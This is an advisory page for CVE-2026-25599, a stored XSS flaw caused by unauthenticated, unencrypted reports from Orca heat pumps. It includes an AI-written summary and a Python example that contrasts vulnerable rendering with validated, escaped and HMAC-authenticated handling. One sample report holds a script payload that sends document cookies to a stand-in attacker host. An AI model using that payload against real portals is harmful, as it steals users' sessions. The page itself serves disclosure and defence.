VYPR
Medium severity · 6.3 · NVD Advisory · Published Jun 1, 2026 · Updated Jun 1, 2026

CVE-2026-25599

Description

Older Orca heat pumps and the Orca user portal are vulnerable to stored XSS and data interception due to missing authentication and unencrypted communication.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Vulnerability

Orca heat pumps and the associated user portal are affected by three related weaknesses: missing device authentication, clear-text data transmission, and a lack of input validation [1]. Older Orca heat pump devices report to the Orca server over unencrypted HTTP on non-TLS ports, so their traffic can be read on the path, and because the server does not authenticate the sending device, reports can also be forged [1]. The portal then aggregates this device data without validating it, so attacker-controlled values are stored and later rendered to portal users, which is what makes the stored Cross-Site Scripting (XSS) possible [1].

Exploitation

Because the device channel is neither authenticated nor encrypted, an attacker can intercept a legitimate heat pump's traffic or impersonate the device and submit crafted reports of their own [1]. A script payload injected into that data stream is stored by the Orca user portal and executes in the browser of any user who views the affected page; the cited report describes using this to steal cookies for the pump's web control interface [1].
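The following Python model is an added illustration of the two halves of this flaw and is not Orca's code or derived from the real portal. It assumes a hypothetical JSON report with device_id, name and temp_c fields, a hypothetical per-device HMAC key for authenticating reports, and a constructed forged report whose name field carries a script tag. The vulnerable renderer interpolates device data straight into HTML; the hardened path authenticates the sender, validates field shapes against an allowlist, and escapes on output.

```python
import hashlib
import hmac
import html
import json
import re

# Hypothetical per-device shared secret. The advisory does not describe how
# Orca provisions devices; this is an assumption used only for the example.
DEVICE_KEYS = {"pump-0001": b"constructed-secret-for-pump-0001"}

# Allowlist for short free-text fields (device id, display name).
NAME_RE = re.compile(r"^[A-Za-z0-9 ._-]{1,64}$")

# Constructed sample reports: one legitimate, one forged by an attacker who
# sits on the unencrypted path or impersonates the pump.
LEGIT = {"device_id": "pump-0001", "name": "Garage unit", "temp_c": 21.5}
FORGED = {
    "device_id": "pump-0001",
    "name": "<script>fetch('https://attacker.example/?c='+document.cookie)</script>",
    "temp_c": 21.5,
}


def vulnerable_render(report: dict) -> str:
    """Flaw class from the advisory: aggregated device data is rendered
    into portal HTML with no validation or escaping, so a forged field
    becomes stored XSS for every portal user who views the row."""
    return f"<tr><td>{report['device_id']}</td><td>{report['name']}</td><td>{report['temp_c']}</td></tr>"


def validate_report(report: dict) -> dict:
    """Reject any report whose fields fall outside the expected shape."""
    device_id = str(report.get("device_id", ""))
    name = str(report.get("name", ""))
    temp = report.get("temp_c")
    if not NAME_RE.fullmatch(device_id):
        raise ValueError("bad device_id")
    if not NAME_RE.fullmatch(name):
        raise ValueError("bad name")
    if isinstance(temp, bool) or not isinstance(temp, (int, float)) or not -50.0 <= temp <= 150.0:
        raise ValueError("bad temp_c")
    return {"device_id": device_id, "name": name, "temp_c": float(temp)}


def report_is_valid(report: dict) -> bool:
    try:
        validate_report(report)
        return True
    except ValueError:
        return False


def hardened_render(report: dict) -> str:
    """Validate on input and escape on output; the allowlist limits what is
    stored, the escaping protects against anything the allowlist admits."""
    clean = validate_report(report)
    return "<tr><td>{}</td><td>{}</td><td>{:.1f}</td></tr>".format(
        html.escape(clean["device_id"]), html.escape(clean["name"]), clean["temp_c"]
    )


def encode_report(report: dict) -> bytes:
    return json.dumps(report, sort_keys=True).encode()


def sign_report(device_id: str, body: bytes) -> str:
    """Device side: tag the report with an HMAC under the device's key."""
    return hmac.new(DEVICE_KEYS[device_id], body, hashlib.sha256).hexdigest()


def verify_report(device_id: str, body: bytes, tag: str) -> bool:
    """Server side: an unknown device or a bad tag is an impersonation attempt."""
    key = DEVICE_KEYS.get(device_id)
    if key is None:
        return False
    expected = hmac.new(key, body, hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, tag)


def ingest(device_id: str, body: bytes, tag: str) -> str:
    """Portal-side handler: authenticate the sender, then validate and render."""
    if not verify_report(device_id, body, tag):
        raise PermissionError("report not authenticated")
    report = json.loads(body)
    if report.get("device_id") != device_id:
        raise PermissionError("device_id mismatch")
    return hardened_render(report)


if __name__ == "__main__":
    print(vulnerable_render(FORGED))  # script tag survives into the page
    print("forged report accepted by hardened path:", report_is_valid(FORGED))
    body = encode_report(LEGIT)
    print(ingest("pump-0001", body, sign_report("pump-0001", body)))
    print("forged tag accepted:", verify_report("pump-0001", body, "0" * 64))
```

The HMAC stands in for the missing device authentication; it does not replace moving the device channel to TLS, which is what stops a passive observer from reading the reports in the first place.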

Impact

Successful exploitation lets an attacker plant script in pages served by the Orca user portal, where it runs with the privileges of whichever user views them [1]. This can lead to the compromise of user accounts, the exposure of sensitive information, and the execution of unauthorized actions within the portal environment [1].

Mitigation

The stored XSS vulnerability in the Orca user portal has been remediated in portal version 1.19 [1]. That fix covers the portal only; for older Orca heat pump devices (more than 5 years old, using legacy CAREL control units) that still communicate without authentication or encryption, users are advised to contact Orca support to resolve the underlying authentication and encryption issues [1].

AI Insight generated on Jun 1, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products

1

Patches

0

No patches discovered yet.

Vulnerability mechanics

No source-code context for this CVE. This section is only generated when we can read the actual fix diff; without it, the four sections (root cause, attack vector, affected code, fix) would be speculation rather than analysis.

References

1

News mentions

0

No linked articles in our index yet.